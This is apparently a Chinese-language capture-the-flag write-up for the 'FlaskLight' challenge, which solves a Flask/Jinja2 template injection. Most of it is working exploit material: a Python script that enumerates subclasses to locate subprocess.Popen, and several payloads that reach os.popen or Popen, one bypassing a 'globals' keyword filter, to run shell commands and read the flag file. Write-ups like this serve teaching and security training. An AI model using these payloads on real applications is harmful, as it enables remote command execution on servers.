[CSCCTF 2019 Qual]FlaskLight
模板注入
搜索,返回查询内容
f12中提示,GET方式传参search可以判断ssti
查看所有子类
?search={
{
''.__class__.__mro__[2].__subclasses__()}}
寻找可用子类,这里使用下python脚本来寻找可用类的序号
import requests
import re
import html
import time
index = 0
for i in range(0, 1000):
try:
url = "http://57640c8d-f6b1-4fa4-9e8a-b4b9c1850d3b.node4.buuoj.cn:81/?search={
{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
r = requests.get(url)
res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)#res[0]数组存储回显
#time.sleep(0.1)
res = html.unescape(res[0])#反转义字符串
print(str(i) + " | " + res)
if "subprocess.Popen" in res:
index = i
break
except:
continue
print("indexo of subprocess.Popen:" + str(index))
#258 | <class 'subprocess.Popen'>
#59 | <class 'warnings.catch_warnings'>
#71 | <class 'site._Printer'>
有三个是比较常用的类
payload1
59 <class ‘warnings.catch_warnings’>
globals似乎被过滤了,可以使用+来绕过过滤
?search={
{
[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("ls").read()')}}
?search={
{
[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("ls /flasklight").read()')}}
?search={
{
[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("cat /flasklight/coomme_geeeett_youur_flek ").read()')}}
payload2
71 | <class ‘site._Printer’>
{
{
[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
payload3
258 | <class ‘subprocess.Popen’>
?search={
{
[].__class__.__base__.__subclasses__()[258]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}